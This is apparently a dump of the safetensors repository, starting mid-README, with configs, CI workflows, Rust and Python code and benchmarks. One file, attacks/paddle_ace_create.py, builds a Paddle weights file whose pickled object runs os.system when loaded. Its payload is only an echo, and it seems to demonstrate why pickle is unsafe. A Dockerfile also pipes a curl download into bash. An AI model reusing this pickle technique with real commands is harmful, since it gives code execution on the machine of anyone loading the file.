"./model.safetensors") 40 | 41 | 42 | # Now loading 43 | loaded = load_file("./model.safetensors") 44 | ``` 45 | 46 | ### Developing 47 | 48 | ``` 49 | # inside ./safetensors/bindings/python 50 | pip install .[dev] 51 | ``` 52 | Should be enough to install this library locally. 
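
For a quick sanity check of a local build, here is a minimal sketch (reusing the `model.safetensors` file from the Usage section above) that inspects a file lazily with `safe_open` instead of loading every tensor at once:

```python
from safetensors import safe_open

# Open the file without eagerly reading the tensor data.
with safe_open("./model.safetensors", framework="np", device="cpu") as f:
    print(f.keys())        # tensor names stored in the header
    a = f.get_tensor("a")  # load only the tensor you need
    print(a.shape, a.dtype)
```

Since `safe_open` reads tensors on demand, this keeps memory use low even for large files.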
53 | 54 | ### Testing 55 | 56 | ``` 57 | # inside ./safetensors/bindings/python 58 | pip install .[dev] 59 | pytest -sv tests/ 60 | ``` 61 | -------------------------------------------------------------------------------- /bindings/python/setup.cfg: -------------------------------------------------------------------------------- 1 | [isort] 2 | default_section = FIRSTPARTY 3 | ensure_newline_before_comments = True 4 | force_grid_wrap = 0 5 | include_trailing_comma = True 6 | known_first_party = transformers 7 | known_third_party = 8 | absl 9 | conllu 10 | datasets 11 | elasticsearch 12 | fairseq 13 | faiss-cpu 14 | fastprogress 15 | fire 16 | fugashi 17 | git 18 | h5py 19 | matplotlib 20 | nltk 21 | numpy 22 | packaging 23 | pandas 24 | PIL 25 | psutil 26 | pytest 27 | pytorch_lightning 28 | rouge_score 29 | sacrebleu 30 | seqeval 31 | sklearn 32 | streamlit 33 | tensorboardX 34 | tensorflow 35 | tensorflow_datasets 36 | timeout_decorator 37 | torch 38 | torchaudio 39 | torchtext 40 | torchvision 41 | torch_xla 42 | tqdm 43 | paddlepaddle 44 | 45 | line_length = 119 46 | lines_after_imports = 2 47 | multi_line_output = 3 48 | use_parentheses = True 49 | 50 | [flake8] 51 | ignore = E203, E501, E741, W503, W605 52 | max-line-length = 119 53 | 54 | [tool:pytest] 55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS -------------------------------------------------------------------------------- /docs/source/convert-weights.md: -------------------------------------------------------------------------------- 1 | # Convert weights to safetensors 2 | 3 | PyTorch model weights are commonly saved and stored as `.bin` files with Python's [`pickle`](https://docs.python.org/3/library/pickle.html) utility. To save and store your model weights in the more secure `safetensor` format, we recommend converting your weights to `.safetensors`. 4 | 5 | The easiest way to convert your model weights is to use the [Convert Space](https://huggingface.co/spaces/safetensors/convert), given your model weights are already stored on the Hub. The Convert Space downloads the pickled weights, converts them, and opens a Pull Request to upload the newly converted `.safetensors` file to your repository. 6 | 7 | 8 | 9 | For larger models, the Space may be a bit slower because its resources are tied up in converting other models. You can also try running the [convert.py](https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py) script (this is what the Space is running) locally to convert your weights. 10 | 11 | Feel free to ping [@Narsil](https://huggingface.co/Narsil) for any issues with the Space. 12 | 13 | 14 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature-request.yml: -------------------------------------------------------------------------------- 1 | name: "\U0001F680 Feature request" 2 | description: Submit a proposal/request for a new safetensors feature 3 | labels: [ "feature" ] 4 | body: 5 | - type: textarea 6 | id: feature-request 7 | validations: 8 | required: true 9 | attributes: 10 | label: Feature request 11 | description: | 12 | A clear and concise description of the feature proposal. Please provide a link to the paper and code in case they exist. 13 | 14 | - type: textarea 15 | id: motivation 16 | validations: 17 | required: true 18 | attributes: 19 | label: Motivation 20 | description: | 21 | Please outline the motivation for the proposal. Is your feature request related to a problem? 
e.g., I'm always frustrated when [...]. If this is related to another GitHub issue, please link here too. 22 | 23 | 24 | - type: textarea 25 | id: contribution 26 | validations: 27 | required: true 28 | attributes: 29 | label: Your contribution 30 | description: | 31 | Is there any way that you could help, e.g. by submitting a PR? Make sure to read the CONTRIBUTING.MD [readme](https://github.com/huggingface/safetensors/blob/main/CONTRIBUTING.md) 32 | -------------------------------------------------------------------------------- /bindings/python/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples 2 | 3 | # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!) 4 | export PYTHONPATH = src 5 | 6 | check_dirs := tests py_src 7 | 8 | modified_only_fixup: 9 | $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) 10 | @if test -n "$(modified_py_files)"; then \ 11 | echo "Checking/fixing $(modified_py_files)"; \ 12 | black --preview $(modified_py_files); \ 13 | isort $(modified_py_files); \ 14 | flake8 $(modified_py_files); \ 15 | else \ 16 | echo "No library .py files were modified"; \ 17 | fi 18 | 19 | 20 | quality: 21 | black --check --preview $(check_dirs) 22 | isort --check-only $(check_dirs) 23 | flake8 $(check_dirs) 24 | # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source 25 | 26 | style: 27 | black --preview $(check_dirs) 28 | isort $(check_dirs) 29 | 30 | # Super fast fix and check target that only works on relevant modified files since the branch was made 31 | 32 | fixup: modified_only_fixup 33 | 34 | test: 35 | python -m pytest -n auto --dist=loadfile -s -v ./tests/ 36 | -------------------------------------------------------------------------------- /safetensors/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![deny(missing_docs)] 2 | #![doc = include_str!("../README.md")] 3 | #![cfg_attr(not(feature = "std"), no_std)] 4 | pub mod slice; 5 | pub mod tensor; 6 | /// serialize_to_file only valid in std 7 | #[cfg(feature = "std")] 8 | pub use tensor::serialize_to_file; 9 | pub use tensor::{serialize, Dtype, SafeTensorError, SafeTensors, View}; 10 | 11 | #[cfg(not(feature = "std"))] 12 | #[macro_use] 13 | extern crate alloc; 14 | 15 | /// A facade around all the types we need from the `std`, `core`, and `alloc` 16 | /// crates. This avoids elaborate import wrangling having to happen in every 17 | /// module. 
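/// For instance, other modules in this crate can simply write
/// `use crate::lib::{Cow, HashMap, String, ToString, Vec};` and get the
/// right types for both `std` and `no_std` builds.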
18 | mod lib { 19 | #[cfg(not(feature = "std"))] 20 | mod no_stds { 21 | pub use alloc::borrow::Cow; 22 | pub use alloc::string::{String, ToString}; 23 | pub use alloc::vec::Vec; 24 | pub use hashbrown::HashMap; 25 | } 26 | #[cfg(feature = "std")] 27 | mod stds { 28 | pub use std::borrow::Cow; 29 | pub use std::collections::HashMap; 30 | pub use std::string::{String, ToString}; 31 | pub use std::vec::Vec; 32 | } 33 | /// choose std or no_std to export by feature flag 34 | #[cfg(not(feature = "std"))] 35 | pub use no_stds::*; 36 | #[cfg(feature = "std")] 37 | pub use stds::*; 38 | } 39 | -------------------------------------------------------------------------------- /Dockerfile.s390x.test: -------------------------------------------------------------------------------- 1 | FROM s390x/python 2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ 3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ 4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh 5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y 6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y 7 | WORKDIR /safetensors/ 8 | RUN /root/miniconda3/bin/pip install -U pip pytest 9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub 10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' 11 | COPY . . 12 | SHELL ["/bin/bash", "-c"] 13 | WORKDIR /safetensors/bindings/python/ 14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . 15 | # Work around error probably caused by https://sourceware.org/bugzilla/show_bug.cgi?id=32653 16 | # E ImportError: libopenblas.so.0: cannot enable executable stack as shared object requires: Invalid argument 17 | ENV GLIBC_TUNABLES=glibc.rtld.execstack=2 18 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py 19 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' 20 | ENTRYPOINT /bin/bash 21 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/Narsil/pre-commit-rust 3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 4 | hooks: 5 | - id: fmt 6 | name: "Rust (fmt)" 7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"] 8 | - id: clippy 9 | name: "Rust (clippy)" 10 | args: 11 | [ 12 | "--manifest-path", 13 | "safetensors/Cargo.toml", 14 | "--all-targets", 15 | "--", 16 | "-Dwarnings", 17 | ] 18 | - repo: https://github.com/Narsil/pre-commit-rust 19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 20 | hooks: 21 | - id: fmt 22 | name: "Python (fmt)" 23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] 24 | - id: clippy 25 | name: "Python (clippy)" 26 | args: 27 | [ 28 | "--manifest-path", 29 | "bindings/python/Cargo.toml", 30 | "--all-targets", 31 | "--", 32 | "-Dwarnings", 33 | ] 34 | - repo: https://github.com/astral-sh/ruff-pre-commit 35 | # Ruff version. 36 | rev: v0.12.8 37 | hooks: 38 | # Run the linter. 39 | - id: ruff-check 40 | # Run the formatter. 
41 | - id: ruff-format 42 | - repo: https://github.com/astral-sh/ruff-pre-commit 43 | # Ruff version. 44 | rev: v0.11.11 45 | hooks: 46 | # Run the linter. 47 | - id: ruff-check 48 | # Run the formatter. 49 | - id: ruff-format 50 | -------------------------------------------------------------------------------- /safetensors/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "safetensors" 3 | version = "0.7.0-dev.0" 4 | edition = "2021" 5 | rust-version = "1.80" 6 | homepage = "https://github.com/huggingface/safetensors" 7 | repository = "https://github.com/huggingface/safetensors" 8 | documentation = "https://docs.rs/safetensors/" 9 | license = "Apache-2.0" 10 | keywords = ["safetensors", "huggingface", "Tensors", "Pytorch", "Tensorflow"] 11 | readme = "./README.md" 12 | description = """ 13 | Provides functions to read and write safetensors which aim to be safer than 14 | their PyTorch counterpart. 15 | The format is 8 bytes which is an unsized int, being the size of a JSON header, 16 | the JSON header refers the `dtype` the `shape` and `data_offsets` which are the offsets 17 | for the values in the rest of the file. 18 | """ 19 | exclude = ["rust-toolchain", "target/*", "Cargo.lock"] 20 | 21 | 22 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 23 | 24 | [dependencies] 25 | serde = { version = "1.0", default-features = false, features = [ 26 | "derive", 27 | "alloc", 28 | ] } 29 | serde_json = { version = "1.0", default-features = false, features = ["alloc"] } 30 | hashbrown = { version = "0.16", features = ["serde"] } 31 | 32 | [target.'cfg(target_os = "macos")'.dependencies] 33 | libc = "0.2" 34 | 35 | [dev-dependencies] 36 | criterion = "0.6" 37 | memmap2 = "0.9" 38 | proptest = "1.7" 39 | 40 | [features] 41 | default = ["std"] 42 | std = ["serde/default", "serde_json/default"] 43 | # Kept for backward compatibility - no-op since alloc is always available 44 | alloc = [] 45 | 46 | [[bench]] 47 | name = "benchmark" 48 | harness = false 49 | -------------------------------------------------------------------------------- /bindings/python/convert_all.py: -------------------------------------------------------------------------------- 1 | """Simple utility tool to convert automatically most downloaded models""" 2 | 3 | from convert import AlreadyExists, convert 4 | from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments 5 | from transformers import AutoConfig 6 | 7 | 8 | if __name__ == "__main__": 9 | api = HfApi() 10 | args = ModelSearchArguments() 11 | 12 | total = 50 13 | models = list( 14 | api.list_models( 15 | filter=ModelFilter(library=args.library.Transformers), 16 | sort="downloads", 17 | direction=-1, 18 | ) 19 | )[:total] 20 | 21 | correct = 0 22 | errors = set() 23 | for model in models: 24 | model = api.model_info(model.id, files_metadata=True) 25 | size = None 26 | for sibling in model.siblings: 27 | if sibling.rfilename == "pytorch_model.bin": 28 | size = sibling.size 29 | if size is None or size > 2_000_000_000: 30 | print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})") 31 | continue 32 | 33 | model_id = model.modelId 34 | print(f"[{model.downloads}] {model.modelId}") 35 | try: 36 | convert(api, model_id) 37 | correct += 1 38 | except AlreadyExists as e: 39 | correct += 1 40 | print(e) 41 | except Exception as e: 42 | config = AutoConfig.from_pretrained(model_id) 43 | errors.add(config.__class__.__name__) 44 | print(e) 45 | 
46 | print(f"Errors: {errors}") 47 | print(f"File size is difference {len(errors)}") 48 | print(f"Correct rate {correct}/{total} ({correct / total * 100:.2f}%)") 49 | -------------------------------------------------------------------------------- /attacks/paddle_ace_create.py: -------------------------------------------------------------------------------- 1 | import paddle 2 | import numpy as np 3 | from collections import Iterable, OrderedDict 4 | 5 | def _parse_every_object(obj, condition_func, convert_func): 6 | if condition_func(obj): 7 | return convert_func(obj) 8 | elif isinstance(obj, (dict, OrderedDict, list)): 9 | if isinstance(obj, list): 10 | keys = range(len(obj)) 11 | else: 12 | keys = list(obj.keys()) 13 | for key in keys: 14 | if condition_func(obj[key]): 15 | obj[key] = convert_func(obj[key]) 16 | else: 17 | obj[key] = _parse_every_object( 18 | obj[key], condition_func, convert_func 19 | ) 20 | return obj 21 | elif isinstance(obj, tuple): 22 | return tuple( 23 | _parse_every_object(list(obj), condition_func, convert_func) 24 | ) 25 | elif isinstance(obj, set): 26 | object(list(obj), condition_func, convert_func) 27 | else: 28 | return obj 29 | 30 | # hack _parse_every_object method 31 | paddle.framework.io._parse_every_object = _parse_every_object 32 | 33 | class BadDict(dict): 34 | def __init__(self, src: str, **kwargs): 35 | super().__init__(**kwargs) 36 | self.src = src 37 | 38 | def __reduce__(self): 39 | return ( 40 | eval, 41 | (f"os.system('{self.src}') or dict()",), 42 | None, 43 | None, 44 | iter(self.items()), 45 | ) 46 | 47 | paddle.save( 48 | [BadDict( 49 | 'echo "pwned your computer, I can do anything I want."', 50 | **{"weight": paddle.zeros((2, 2))}, 51 | )], 52 | "paddle_ace.pdparams", 53 | ) 54 | -------------------------------------------------------------------------------- /docs/safetensors.schema.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://json-schema.org/draft/2020-12/schema", 3 | "title": "safetensors format header", 4 | "description": "Describes the structure of all the tensors and their metadata", 5 | "$defs": { 6 | "size_t": { 7 | "type": "integer", 8 | "minimum": 0, 9 | "maximum": 281474976710655, 10 | "description": "A natural integer no more than 48 bits (current CPU limitation, not all 64 bits are used)" 11 | }, 12 | "Tensor": { 13 | "title": "Tensor", 14 | "description": "Describes the structure of one tensor", 15 | "type": "object", 16 | "additionalProperties": false, 17 | "properties": { 18 | "dtype": { 19 | "type": "string", 20 | "pattern": "([UIF])(8|16|32|64|128|256)", 21 | "description": "Type of the array. U - unsigned int, I - signed int, F - IEEE 754 floating-point. Number is the count of bits." 22 | }, 23 | "shape": { 24 | "type": "array", 25 | "items": { 26 | "$ref": "#/$defs/size_t", 27 | "description": "Size of each dimension." 28 | } 29 | }, 30 | "data_offsets": { 31 | "type": "array", 32 | "prefixItems": [ 33 | { 34 | "$ref": "#/$defs/size_t", 35 | "description": "Start offset of the array. " 36 | }, 37 | { 38 | "$ref": "#/$defs/size_t", 39 | "description": "End offset of the array. Equal to the previous item + array size." 
40 | } 41 | ] 42 | } 43 | }, 44 | "required": [ 45 | "data_offsets", 46 | "dtype", 47 | "shape" 48 | ] 49 | }, 50 | "Metadata": { 51 | "type": "object", 52 | "additionalProperties": {"type": "string"}, 53 | "title": "Metadata" 54 | } 55 | }, 56 | "type": "object", 57 | "properties": { 58 | "__metadata__": { 59 | "description": "Arbitrary metadata", 60 | "$ref": "#/$defs/Metadata" 61 | } 62 | }, 63 | "additionalProperties": { 64 | "$ref": "#/$defs/Tensor" 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /.github/workflows/rust.yml: -------------------------------------------------------------------------------- 1 | name: Rust 2 | 3 | on: 4 | pull_request: 5 | 6 | jobs: 7 | build: 8 | runs-on: ${{ matrix.os }} 9 | strategy: 10 | matrix: 11 | os: [ubuntu-latest, windows-latest, macOS-latest] 12 | toolchain: [stable] 13 | include: 14 | - os: ubuntu-latest 15 | toolchain: "1.74" 16 | defaults: 17 | run: 18 | working-directory: ./safetensors 19 | 20 | steps: 21 | - uses: actions/checkout@v6 22 | 23 | - name: Install Rust Stable 24 | uses: dtolnay/rust-toolchain@stable 25 | with: 26 | components: rustfmt, clippy, llvm-tools-preview 27 | override: true 28 | 29 | - uses: Swatinem/rust-cache@v2 30 | 31 | - name: Install cargo-audit 32 | run: cargo install cargo-audit 33 | 34 | - name: Install cargo-llvm-cov for Ubuntu 35 | if: matrix.os == 'ubuntu-latest' 36 | run: cargo install cargo-llvm-cov 37 | 38 | - name: Build 39 | run: cargo build --all-targets --verbose 40 | 41 | - name: Lint with Clippy 42 | run: cargo clippy --all-targets -- -D warnings 43 | 44 | - name: Run Tests 45 | run: cargo test --verbose 46 | 47 | - name: Run No-STD Tests 48 | run: cargo test --no-default-features --verbose 49 | 50 | - name: Run Audit 51 | # RUSTSEC-2021-0145 is criterion so only within benchmarks 52 | run: cargo audit -D warnings --ignore RUSTSEC-2021-0145 53 | 54 | - name: Coverage report 55 | if: matrix.os == 'ubuntu-latest' 56 | run: cargo llvm-cov --release --lcov --output-path lcov.info 57 | 58 | # - name: Upload to codecov.io 59 | # if: matrix.os == 'ubuntu-latest' 60 | # uses: codecov/codecov-action@v3 61 | # with: 62 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 63 | # working-directory: ./safetensors 64 | # fail_ci_if_error: true 65 | -------------------------------------------------------------------------------- /safetensors/benches/benchmark.rs: -------------------------------------------------------------------------------- 1 | use criterion::{criterion_group, criterion_main, Criterion}; 2 | use safetensors::tensor::*; 3 | use std::collections::HashMap; 4 | use std::hint::black_box; 5 | 6 | // Returns a sample data of size 2_MB 7 | fn get_sample_data() -> (Vec, Vec, Dtype) { 8 | let shape = vec![1000, 500]; 9 | let dtype = Dtype::F32; 10 | let nbits = shape.iter().product::() * dtype.bitsize(); 11 | assert!(nbits % 8 == 0); 12 | let n: usize = nbits / 8; // 4 13 | let data = vec![0; n]; 14 | 15 | (data, shape, dtype) 16 | } 17 | 18 | pub fn bench_serialize(c: &mut Criterion) { 19 | let (data, shape, dtype) = get_sample_data(); 20 | let n_layers = 5; 21 | 22 | let mut metadata: HashMap = HashMap::new(); 23 | // 2_MB x 5 = 10_MB 24 | for i in 0..n_layers { 25 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 26 | metadata.insert(format!("weight{i}"), tensor); 27 | } 28 | 29 | c.bench_function("Serialize 10_MB", |b| { 30 | b.iter(|| { 31 | let _serialized = serialize(black_box(&metadata), 
black_box(None)); 32 | }) 33 | }); 34 | } 35 | 36 | pub fn bench_deserialize(c: &mut Criterion) { 37 | let (data, shape, dtype) = get_sample_data(); 38 | let n_layers = 5; 39 | 40 | let mut metadata: HashMap = HashMap::new(); 41 | // 2_MB x 5 = 10_MB 42 | for i in 0..n_layers { 43 | let tensor = TensorView::new(dtype, shape.clone(), &data[..]).unwrap(); 44 | metadata.insert(format!("weight{i}"), tensor); 45 | } 46 | 47 | let out = serialize(&metadata, None).unwrap(); 48 | 49 | c.bench_function("Deserialize 10_MB", |b| { 50 | b.iter(|| { 51 | let _deserialized = SafeTensors::deserialize(black_box(&out)).unwrap(); 52 | }) 53 | }); 54 | } 55 | 56 | criterion_group!(bench_ser, bench_serialize); 57 | criterion_group!(bench_de, bench_deserialize); 58 | criterion_main!(bench_ser, bench_de); 59 | -------------------------------------------------------------------------------- /.github/workflows/python-bench.yml: -------------------------------------------------------------------------------- 1 | name: Simple benchmarks 2 | on: 3 | push: 4 | branches: 5 | - main 6 | pull_request: 7 | 8 | 9 | permissions: 10 | # deployments permission to deploy GitHub pages website 11 | deployments: write 12 | # contents permission to update benchmark contents in gh-pages branch 13 | contents: write 14 | 15 | jobs: 16 | benchmark: 17 | name: Performance regression check 18 | runs-on: ubuntu-latest 19 | steps: 20 | - uses: actions/checkout@v6 21 | - name: Install Rust 22 | uses: dtolnay/rust-toolchain@stable 23 | with: 24 | components: rustfmt, clippy 25 | 26 | - name: Install Python 27 | uses: actions/setup-python@v6 28 | with: 29 | python-version: "3.12" 30 | architecture: "x64" 31 | 32 | - name: Install 33 | working-directory: ./bindings/python 34 | run: | 35 | pip install -U pip uv 36 | uv sync --extra dev 37 | 38 | - name: Run tests 39 | working-directory: ./bindings/python 40 | run: | 41 | cargo test 42 | uv run pytest --benchmark-json output.json benches/ 43 | # Download previous benchmark result from cache (if exists) 44 | - name: Download previous benchmark data 45 | uses: actions/cache@v5 46 | with: 47 | path: ./cache 48 | key: ${{ runner.os }}-benchmark 49 | # Run `github-action-benchmark` action 50 | - name: Store benchmark result 51 | uses: benchmark-action/github-action-benchmark@v1 52 | with: 53 | # What benchmark tool the output.txt came from 54 | tool: 'pytest' 55 | # Where the output from the benchmark tool is stored 56 | output-file-path: ./bindings/python/output.json 57 | github-token: ${{ secrets.GITHUB_TOKEN }} 58 | # Push and deploy GitHub pages branch automatically 59 | auto-push: ${{ github.event.pull_request.head.repo.fork == false }} 60 | comment-on-alert: true 61 | # Mention @rhysd in the commit comment 62 | alert-comment-cc-users: '@danieldk,@McPatate' 63 | -------------------------------------------------------------------------------- /bindings/python/benches/test_paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import numpy as np 5 | 6 | import paddle 7 | from safetensors.paddle import load_file, save_file 8 | 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = paddle.zeros((50257, 768)) 13 | tensors["wpe"] = paddle.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) 18 | 
tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) 22 | tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) 23 | tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) 28 | tensors["ln_f.weight"] = paddle.zeros((768,)) 29 | tensors["ln_f.bias"] = paddle.zeros((768,)) 30 | return tensors 31 | 32 | 33 | def test_paddle_paddle_load(benchmark): 34 | # benchmark something 35 | weights = create_gpt2(12) 36 | with tempfile.NamedTemporaryFile(delete=False) as f: 37 | paddle.save(weights, f.name) 38 | result = benchmark(paddle.load, f.name) 39 | os.unlink(f.name) 40 | 41 | for k, v in weights.items(): 42 | tv = result[k] 43 | assert paddle.allclose(v, tv) 44 | 45 | 46 | def test_paddle_sf_load(benchmark): 47 | # benchmark something 48 | weights = create_gpt2(12) 49 | with tempfile.NamedTemporaryFile(delete=False) as f: 50 | save_file(weights, f.name) 51 | result = benchmark(load_file, f.name) 52 | os.unlink(f.name) 53 | 54 | for k, v in weights.items(): 55 | tv = result[k] 56 | assert np.allclose(v, tv) 57 | -------------------------------------------------------------------------------- /bindings/python/benches/test_flax.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import jax.numpy as jnp 5 | from flax.serialization import msgpack_restore, msgpack_serialize 6 | from safetensors.flax import load_file, save_file 7 | 8 | 9 | def create_gpt2(n_layers: int): 10 | tensors = {} 11 | tensors["wte"] = jnp.zeros((50257, 768)) 12 | tensors["wpe"] = jnp.zeros((1024, 768)) 13 | for i in range(n_layers): 14 | tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) 15 | tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) 16 | tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) 17 | tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) 18 | tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) 19 | tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) 20 | tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) 21 | tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) 22 | tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) 23 | tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) 24 | tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) 25 | tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) 26 | tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) 27 | tensors["ln_f.weight"] = jnp.zeros((768)) 28 | tensors["ln_f.bias"] = jnp.zeros((768)) 29 | return tensors 30 | 31 | 32 | def load(filename): 33 | with open(filename, "rb") as f: 34 | data = f.read() 35 | flax_weights = msgpack_restore(data) 36 | return flax_weights 37 | 38 | 39 | def test_flax_flax_load(benchmark): 40 | # benchmark something 41 | weights = create_gpt2(12) 42 | with tempfile.NamedTemporaryFile(delete=False) as f: 43 | serialized = msgpack_serialize(weights) 44 | f.write(serialized) 45 | result = benchmark(load, f.name) 46 | os.unlink(f.name) 47 | 48 | for k, v in weights.items(): 49 | tv = result[k] 50 | assert jnp.allclose(v, tv) 51 | 52 | 53 | def test_flax_sf_load(benchmark): 54 | # 
benchmark something 55 | weights = create_gpt2(12) 56 | with tempfile.NamedTemporaryFile(delete=False) as f: 57 | save_file(weights, f.name) 58 | result = benchmark(load_file, f.name) 59 | os.unlink(f.name) 60 | 61 | for k, v in weights.items(): 62 | tv = result[k] 63 | assert jnp.allclose(v, tv) 64 | -------------------------------------------------------------------------------- /bindings/python/benches/test_mlx.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import tempfile 4 | 5 | 6 | if platform.system() == "Darwin": 7 | import mlx.core as mx 8 | from safetensors.mlx import load_file, save_file 9 | 10 | def create_gpt2(n_layers: int): 11 | tensors = {} 12 | tensors["wte"] = mx.zeros((50257, 768)) 13 | tensors["wpe"] = mx.zeros((1024, 768)) 14 | for i in range(n_layers): 15 | tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) 16 | tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) 17 | tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) 18 | tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) 19 | tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) 20 | tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) 21 | tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) 22 | tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) 23 | tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) 24 | tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) 25 | tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) 26 | tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) 27 | tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) 28 | tensors["ln_f.weight"] = mx.zeros((768)) 29 | tensors["ln_f.bias"] = mx.zeros((768)) 30 | return tensors 31 | 32 | def load(filename): 33 | return mx.load(filename) 34 | 35 | def test_mlx_mlx_load(benchmark): 36 | # benchmark something 37 | weights = create_gpt2(12) 38 | with tempfile.NamedTemporaryFile(delete=False) as f: 39 | filename = f"{f.name}.npz" 40 | mx.savez(filename, **weights) 41 | result = benchmark(load, filename) 42 | os.unlink(f.name) 43 | 44 | for k, v in weights.items(): 45 | tv = result[k] 46 | assert mx.allclose(v, tv) 47 | 48 | def test_mlx_sf_load(benchmark): 49 | # benchmark something 50 | weights = create_gpt2(12) 51 | with tempfile.NamedTemporaryFile(delete=False) as f: 52 | save_file(weights, f.name) 53 | result = benchmark(load_file, f.name) 54 | os.unlink(f.name) 55 | 56 | for k, v in weights.items(): 57 | tv = result[k] 58 | assert mx.allclose(v, tv) 59 | -------------------------------------------------------------------------------- /bindings/python/tests/test_handle.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import numpy as np 4 | 5 | from safetensors import _safe_open_handle 6 | from safetensors.numpy import save_file, save 7 | 8 | 9 | class ReadmeTestCase(unittest.TestCase): 10 | def assertTensorEqual(self, tensors1, tensors2, equality_fn): 11 | self.assertEqual(tensors1.keys(), tensors2.keys(), "tensor keys don't match") 12 | 13 | for k, v1 in tensors1.items(): 14 | v2 = tensors2[k] 15 | 16 | self.assertTrue(equality_fn(v1, v2), f"{k} tensors are different") 17 | 18 | def test_numpy_example(self): 19 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 20 | 21 | save_file(tensors, "./out_np.safetensors") 22 | 23 | # Now loading 24 | loaded = {} 25 | with open("./out_np.safetensors", "r") as f: 26 | with _safe_open_handle(f, framework="np", device="cpu") as g: 27 | for 
